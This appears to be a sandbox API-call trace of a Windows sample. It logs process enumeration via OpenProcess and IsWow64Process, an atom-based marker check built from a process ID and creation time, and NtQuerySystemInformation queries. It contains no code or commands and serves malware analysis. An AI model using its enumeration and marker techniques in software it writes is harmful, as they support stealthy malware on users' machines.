	[0072.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.049] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0072.049] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.049] CloseHandle (hObject=0x224) returned 1
	[0072.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x728a38, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0072.049] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0072.049] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.049] CloseHandle (hObject=0x224) returned 1
	[0072.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.049] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0072.049] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.050] CloseHandle (hObject=0x224) returned 1
	[0072.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0072.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0072.050] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.050] CloseHandle (hObject=0x224) returned 1
	[0072.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0072.050] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.050] CloseHandle (hObject=0x224) returned 1
	[0072.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0072.050] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.050] CloseHandle (hObject=0x224) returned 1
	[0072.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x7289b8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0072.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0072.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0072.051] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.051] CloseHandle (hObject=0x224) returned 1
	[0072.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0072.051] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.051] CloseHandle (hObject=0x224) returned 1
	[0072.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dcf0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0072.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0072.051] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.051] CloseHandle (hObject=0x224) returned 1
	[0072.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x7289f8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0072.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0072.052] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.052] CloseHandle (hObject=0x224) returned 1
	[0072.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72e8b0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0072.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0072.052] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.052] CloseHandle (hObject=0x224) returned 1
	[0072.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x728998, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0072.052] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.052] CloseHandle (hObject=0x224) returned 1
	[0072.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0072.052] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.052] CloseHandle (hObject=0x224) returned 1
	[0072.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.053] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0072.053] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.053] CloseHandle (hObject=0x224) returned 1
	[0072.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x7288b8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0072.053] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0072.053] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.053] CloseHandle (hObject=0x224) returned 1
	[0072.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x728958, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.053] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0072.053] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.053] CloseHandle (hObject=0x224) returned 1
	[0072.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x7721d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.053] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0072.053] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.053] CloseHandle (hObject=0x224) returned 1
	[0072.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x7721b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.053] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0072.053] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.054] CloseHandle (hObject=0x224) returned 1
	[0072.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72ea18, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0072.054] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0072.054] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.054] CloseHandle (hObject=0x224) returned 1
	[0072.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772200, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.054] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0072.054] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.054] CloseHandle (hObject=0x224) returned 1
	[0072.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x7721a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0072.054] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0072.054] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.054] CloseHandle (hObject=0x224) returned 1
	[0072.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x7289f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0072.054] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0072.054] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.054] CloseHandle (hObject=0x224) returned 1
	[0072.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x772170, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.054] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0072.055] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.055] CloseHandle (hObject=0x224) returned 1
	[0072.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x728998, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0072.055] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0072.055] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.055] CloseHandle (hObject=0x224) returned 1
	[0072.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72eb30, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0072.055] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0072.055] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.055] CloseHandle (hObject=0x224) returned 1
	[0072.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72e888, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0072.055] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0072.055] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.055] CloseHandle (hObject=0x224) returned 1
	[0072.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x7721b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.055] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0072.055] GetLastError () returned 0x5
	[0072.055] GetLastError () returned 0x5
	[0072.055] GetLastError () returned 0x5
	[0072.055] GetLastError () returned 0x5
	[0072.055] GetLastError () returned 0x5
	[0072.055] GetLastError () returned 0x5
	[0072.055] GetLastError () returned 0x5
	[0072.055] GetLastError () returned 0x5
	[0072.055] GetLastError () returned 0x5
	[0072.055] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetLastError () returned 0x5
	[0072.056] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.057] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0072.057] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0072.057] GetLastError () returned 0x5
	[0072.057] GetLastError () returned 0x5
	[0072.057] GetLastError () returned 0x5
	[0072.057] GetLastError () returned 0x5
	[0072.057] GetLastError () returned 0x5
	[0072.057] GetLastError () returned 0x5
	[0072.057] GetLastError () returned 0x5
	[0072.057] GetLastError () returned 0x5
	[0072.057] GetLastError () returned 0x5
	[0072.057] GetLastError () returned 0x5
	[0072.057] GetLastError () returned 0x5
	[0072.057] GetLastError () returned 0x5
	[0072.057] GetLastError () returned 0x5
	[0072.057] GetLastError () returned 0x5
	[0072.057] GetLastError () returned 0x5
	[0072.057] GetLastError () returned 0x5
	[0072.057] GetLastError () returned 0x5
	[0072.057] GetLastError () returned 0x5
	[0072.057] GetLastError () returned 0x5
	[0072.057] GetLastError () returned 0x5
	[0072.057] GetLastError () returned 0x5
	[0072.057] GetLastError () returned 0x5
	[0072.057] GetLastError () returned 0x5
	[0072.057] GetLastError () returned 0x5
	[0072.057] GetLastError () returned 0x5
	[0072.057] GetLastError () returned 0x5
	[0072.057] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0072.057] GetLastError () returned 0x5
	[0072.057] GetLastError () returned 0x5
	[0072.057] GetLastError () returned 0x5
	[0072.057] GetLastError () returned 0x5
	[0072.057] GetLastError () returned 0x5
	[0072.057] GetLastError () returned 0x5
	[0072.057] GetLastError () returned 0x5
	[0072.057] GetLastError () returned 0x5
	[0072.057] GetLastError () returned 0x5
	[0072.057] GetLastError () returned 0x5
	[0072.057] GetLastError () returned 0x5
	[0072.057] GetLastError () returned 0x5
	[0072.057] GetLastError () returned 0x5
	[0072.057] GetLastError () returned 0x5
	[0072.057] GetLastError () returned 0x5
	[0072.057] GetLastError () returned 0x5
	[0072.057] GetLastError () returned 0x5
	[0072.057] GetLastError () returned 0x5
	[0072.057] GetLastError () returned 0x5
	[0072.057] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.058] GetLastError () returned 0x5
	[0072.059] GetLastError () returned 0x5
	[0072.059] GetLastError () returned 0x5
	[0072.059] GetLastError () returned 0x5
	[0072.059] GetLastError () returned 0x5
	[0072.059] GetLastError () returned 0x5
	[0072.059] GetLastError () returned 0x5
	[0072.059] GetLastError () returned 0x5
	[0072.059] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.059] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0072.059] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.059] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0072.059] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0072.059] CloseHandle (hObject=0x224) returned 1
	[0072.059] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0072.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.059] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0072.059] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.059] CloseHandle (hObject=0x224) returned 1
	[0072.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72e8b0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0072.060] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0072.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.060] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0072.060] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.060] CloseHandle (hObject=0x224) returned 1
	[0072.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772218, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0072.098] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16c78) returned 0xc0000004
	[0072.099] VirtualAlloc (lpAddress=0x0, dwSize=0x16d78, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0072.099] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16d78, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0072.100] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0072.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x772218, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0072.100] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0072.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772158, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.100] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0072.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.100] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0072.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772218, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
